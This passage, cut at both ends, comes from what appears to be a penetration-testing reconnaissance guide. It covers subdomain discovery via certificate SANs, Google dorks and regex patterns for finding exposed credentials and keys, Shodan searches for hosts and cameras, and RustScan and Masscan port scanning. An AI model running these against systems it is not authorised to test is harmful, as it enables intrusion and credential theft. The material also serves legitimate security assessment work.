&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;while&lt;/span&gt; &lt;span style="color:#f2d5cf"&gt;IFS&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#99d1db"&gt;read&lt;/span&gt; -r d; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;ip&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;dig +short &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$d&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; | head -1&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;[&lt;/span&gt; -n &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$ip&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;]&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$d&lt;/span&gt;&lt;span style="color:#a6d189"&gt; -&amp;gt; &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$ip&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt; &amp;lt; subdomains.txt
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="certificate-san--hidden-subdomains-in-the-ssl-certificate" &gt;
&lt;div&gt;
&lt;a href="#certificate-san--hidden-subdomains-in-the-ssl-certificate"&gt;
###
&lt;/a&gt;
Certificate SAN — Hidden Subdomains in the SSL Certificate
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;Beyond crt.sh, the server&amp;rsquo;s own SSL certificate may contain subdomains in the &lt;strong&gt;Subject Alternative Name (SAN)&lt;/strong&gt; field that don&amp;rsquo;t appear in CT logs:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Extract SANs directly from the certificate&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;openssl s_client -connect target.com:443 -servername target.com &amp;lt;/dev/null 2&amp;gt;/dev/null | &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; openssl x509 -noout -ext subjectAltName | grep -oP &lt;span style="color:#a6d189"&gt;&amp;#39;DNS:[^,]+&amp;#39;&lt;/span&gt; | cut -d: -f2 | sort -u
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Via Python (more complete)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python3 -c &lt;span style="color:#a6d189"&gt;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;import ssl, socket, json
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;ctx = ssl.create_default_context()
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;ctx.check_hostname = False
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;ctx.verify_mode = ssl.CERT_NONE
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;with ctx.wrap_socket(socket.socket(), server_hostname=&amp;#39;target.com&amp;#39;) as s:
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; s.connect((&amp;#39;target.com&amp;#39;, 443))
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; cert = s.getpeercert()
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; for san in cert.get(&amp;#39;subjectAltName&amp;#39;, ()):
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; if san[0] == &amp;#39;DNS&amp;#39;:
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; print(san[1])
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Extract full certificate metadata&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; | openssl s_client -connect target.com:443 -servername target.com 2&amp;gt;/dev/null | &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; openssl x509 -noout -text | grep -A1 &lt;span style="color:#a6d189"&gt;&amp;#34;Subject Alternative Name&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Advantage&lt;/strong&gt;: Discovers *.gob.ar and *.gov.ar subdomains simultaneously (when the org uses both TLDs).
&lt;strong&gt;Real-world case&lt;/strong&gt;: MPF Argentina — the SSO certificate revealed &lt;code&gt;fiscales.gob.ar&lt;/code&gt;, &lt;code&gt;fiscales.gov.ar&lt;/code&gt;, &lt;code&gt;mpf.gov.ar&lt;/code&gt;, &lt;code&gt;www.fiscales.gob.ar&lt;/code&gt;, &lt;code&gt;www.fiscales.gov.ar&lt;/code&gt; that didn&amp;rsquo;t appear in conventional CT searches.&lt;/p&gt;
&lt;h3 id="google-dorks--exposed-configs--secrets" &gt;
&lt;div&gt;
&lt;a href="#google-dorks--exposed-configs--secrets"&gt;
##
&lt;/a&gt;
Google Dorks — Exposed Configs &amp;amp; Secrets
&lt;/div&gt;
&lt;/h3&gt;
&lt;h4 id="high-precision-dorks" &gt;
&lt;div&gt;
&lt;a href="#high-precision-dorks"&gt;
###
&lt;/a&gt;
High-Precision Dorks
&lt;/div&gt;
&lt;/h4&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;site:$target &amp;#34;APP_KEY&amp;#34;
site:$target &amp;#34;DB_PASSWORD&amp;#34;
site:$target &amp;#34;-----BEGIN RSA PRIVATE KEY-----&amp;#34;
site:$target filetype:env
site:$target inurl:git/config
site:$target intitle:&amp;#34;index of&amp;#34; &amp;#34;.env&amp;#34;
site:$target &amp;#34;api_key&amp;#34; OR &amp;#34;apikey&amp;#34; OR &amp;#34;secret_key&amp;#34;
site:$target &amp;#34;firebase&amp;#34; &amp;#34;apiKey&amp;#34;
site:$target &amp;#34;supabase&amp;#34; &amp;#34;anon&amp;#34; &amp;#34;key&amp;#34;
site:$target inurl:&amp;#34;/.env&amp;#34; &amp;#34;DB_PASSWORD&amp;#34;
site:$target &amp;#34;client_secret&amp;#34; &amp;#34;redirect_uris&amp;#34; extension:json
site:$target &amp;#34;private_key&amp;#34; &amp;#34;client_email&amp;#34; extension:json
&lt;/code&gt;&lt;/pre&gt;&lt;h4 id="dork-for-exposed-configuration-files" &gt;
&lt;div&gt;
&lt;a href="#dork-for-exposed-configuration-files"&gt;
###
&lt;/a&gt;
Dork for Exposed Configuration Files
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;Searches for ALL file extensions that may contain credentials and configurations:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;site:target.com ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess | ext:json
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This covers:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;logs&lt;/strong&gt; → tokens, SQL queries, emails in plain text&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;txt/conf/cnf/ini&lt;/strong&gt; → server configurations, DB hosts&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;env&lt;/strong&gt; → environment variables with credentials&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;sh&lt;/strong&gt; → scripts with hardcoded passwords&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;bak/backup/swp/old/~&lt;/strong&gt; → backup files with old versions (sometimes without sanitization)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;git/svn&lt;/strong&gt; → exposed versioned repositories&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;htpasswd/htaccess&lt;/strong&gt; → access control with hashes&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;json&lt;/strong&gt; → service accounts, Firebase configs, Supabase configs&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="dorks-for-specific-services" &gt;
&lt;div&gt;
&lt;a href="#dorks-for-specific-services"&gt;
###
&lt;/a&gt;
Dorks for Specific Services
&lt;/div&gt;
&lt;/h4&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;# Supabase
site:target.com &amp;#34;supabase.co&amp;#34; &amp;#34;anon_key&amp;#34; OR &amp;#34;SUPABASE_ANON_KEY&amp;#34;
# Firebase
site:target.com &amp;#34;firebase-adminsdk&amp;#34; &amp;#34;private_key_id&amp;#34; extension:json
# AWS
site:target.com &amp;#34;AKIA&amp;#34; filetype:env NOT example NOT test
# SendGrid
site:target.com &amp;#34;SG.&amp;#34; filetype:env NOT example
# MongoDB
site:target.com &amp;#34;mongodb+srv://&amp;#34; &amp;#34;password&amp;#34; extension:env NOT example NOT test
# Docker
site:target.com &amp;#34;docker-compose.yml&amp;#34; &amp;#34;environment:&amp;#34; NOT example
# CI/CD
site:target.com &amp;#34;.gitlab-ci.yml&amp;#34; &amp;#34;token&amp;#34; OR &amp;#34;secret&amp;#34;
site:target.com &amp;#34;.github/workflows&amp;#34; &amp;#34;secrets.&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;h4 id="automated-secret-extraction-from-google-dorks" &gt;
&lt;div&gt;
&lt;a href="#automated-secret-extraction-from-google-dorks"&gt;
###
&lt;/a&gt;
Automated Secret Extraction from Google Dorks
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;requests&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;re&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;from&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;bs4&lt;/span&gt; &lt;span style="color:#81c8be"&gt;import&lt;/span&gt; BeautifulSoup
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;def&lt;/span&gt; &lt;span style="color:#8caaee"&gt;google_dork_search&lt;/span&gt;(dork, num_results&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;50&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&amp;#34;&amp;#34;Searches using Google dork and extracts secret patterns.&amp;#34;&amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; headers &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;User-Agent&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;Mozilla/5.0&amp;#34;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Use Google Custom Search API or HTML results parsing&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# (direct Google scraping is blocked — use API)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Patterns to extract from results&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;EXTRACT_PATTERNS &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:DB_PASSWORD|DB_USERNAME|DB_HOST|DB_DATABASE)\s*=\s*(\S+)&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;DB Config&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:APP_KEY|APP_SECRET)\s*=\s*(\S+)&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;App Key&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:JWT_SECRET|JWT_KEY)\s*=\s*(\S+)&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;JWT Secret&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY)\s*=\s*(\S+)&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;AWS Key&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:MAIL_PASSWORD|MAIL_USERNAME|SMTP_PASS)\s*=\s*(\S+)&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;Email Config&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:REDIS_PASSWORD|REDIS_URL)\s*=\s*(\S+)&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;Redis Config&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="shodan-for-infrastructure" &gt;
&lt;div&gt;
&lt;a href="#shodan-for-infrastructure"&gt;
##
&lt;/a&gt;
Shodan (for infrastructure)
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Port statistics by ASN/ISP&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shodan stats --facets port --limit &lt;span style="color:#ef9f76"&gt;20&lt;/span&gt; org:&lt;span style="color:#a6d189"&gt;&amp;#34;ISP NAME&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Search by specific banner&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shodan search &lt;span style="color:#a6d189"&gt;&amp;#34;Apache/2.4.62&amp;#34;&lt;/span&gt; --fields ip_str,port,org
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Search cameras in a range&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shodan search --fields ip_str,port,org net:187.0.0.0/8 has_screenshot:true
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="emails-and-people" &gt;
&lt;div&gt;
&lt;a href="#emails-and-people"&gt;
##
&lt;/a&gt;
Emails and People
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# hunter.io for domain email patterns&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# haveibeenpwned.com to check leaked emails&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# LinkedIn + Google to map employees (firstname.lastname@target.com)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;hr&gt;
&lt;h2 id="4-active-reconnaissance--nmap-masscan-and-rustscan" &gt;
&lt;div&gt;
&lt;a href="#4-active-reconnaissance--nmap-masscan-and-rustscan"&gt;
#
&lt;/a&gt;
4. ACTIVE RECONNAISSANCE — NMAP, MASSCAN AND RUSTSCAN
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="41-rustscan--fast-port-scanner" &gt;
&lt;div&gt;
&lt;a href="#41-rustscan--fast-port-scanner"&gt;
##
&lt;/a&gt;
4.1 RustScan — Fast Port Scanner
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;RustScan is ideal for individual targets or small ranges. Extremely fast (3s for 1000 ports).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Installation (Docker)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker pull rustscan/rustscan:2.1.1
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;alias&lt;/span&gt; &lt;span style="color:#f2d5cf"&gt;rustscan&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;docker run -it --rm --name rustscan rustscan/rustscan:2.1.1&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Cargo&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cargo install rustscan
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;export&lt;/span&gt; &lt;span style="color:#f2d5cf"&gt;PATH&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$HOME&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/.cargo/bin:&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$PATH&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="essential-commands" &gt;
&lt;div&gt;
&lt;a href="#essential-commands"&gt;
###
&lt;/a&gt;
Essential Commands
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Fast scan of common ports&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rustscan -a 192.168.1.1 -p 21,22,25,80,443,3306,5432,6379,8080,8443 --ulimit &lt;span style="color:#ef9f76"&gt;5000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Full scan + Nmap version enumeration&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rustscan -a 192.168.1.1 -r 1-10000 -t &lt;span style="color:#ef9f76"&gt;500&lt;/span&gt; -b &lt;span style="color:#ef9f76"&gt;1500&lt;/span&gt; --ulimit &lt;span style="color:#ef9f76"&gt;5000&lt;/span&gt; -- -sC -sV
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# /24 range scan&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rustscan -a 192.168.1.0/24 --ulimit &lt;span style="color:#ef9f76"&gt;5000&lt;/span&gt; -g
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Greppable output (easy to parse)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rustscan -a target.com -r 1-10000 -g | grep &lt;span style="color:#a6d189"&gt;&amp;#34;Open&amp;#34;&lt;/span&gt; | cut -d&lt;span style="color:#a6d189"&gt;&amp;#39; &amp;#39;&lt;/span&gt; -f2 &amp;gt; open_ports.txt
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Performance&lt;/strong&gt;: RustScan ~3s vs curl loop ~20min for 1000 ports (&lt;strong&gt;400x gain&lt;/strong&gt;).&lt;/p&gt;
&lt;h3 id="42-masscan--internet-scale-scanner" &gt;
&lt;div&gt;
&lt;a href="#42-masscan--internet-scale-scanner"&gt;
##
&lt;/a&gt;
4.2 Masscan — Internet-Scale Scanner
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Masscan is for massive ranges (/8, /0). Can scan the entire Internet on 1 port in 5 minutes.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Installation (from source)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;cd&lt;/span&gt; masscan &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; make -j&lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;nproc&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo make install
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="essential-flags" &gt;
&lt;div&gt;
&lt;a href="#essential-flags"&gt;
###
&lt;/a&gt;
Essential Flags
&lt;/div&gt;
&lt;/h4&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Flag&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;th&gt;Example&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-p&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Ports (required)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;-p80,443,8000-8100&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;--rate&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Packets/second (default 100, max ~1.6M)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;--rate 100000&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-oL&lt;/code&gt;/&lt;code&gt;-oJ&lt;/code&gt;/&lt;code&gt;-oG&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Output (list/JSON/grepable)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;-oJ scan.json&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;--open&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Open ports only&lt;/td&gt;
&lt;td&gt;&lt;code&gt;--open&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;--banners&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Banner grabbing&lt;/td&gt;
&lt;td&gt;&lt;code&gt;--banners&lt;/code&gt;&lt;/td&gt;
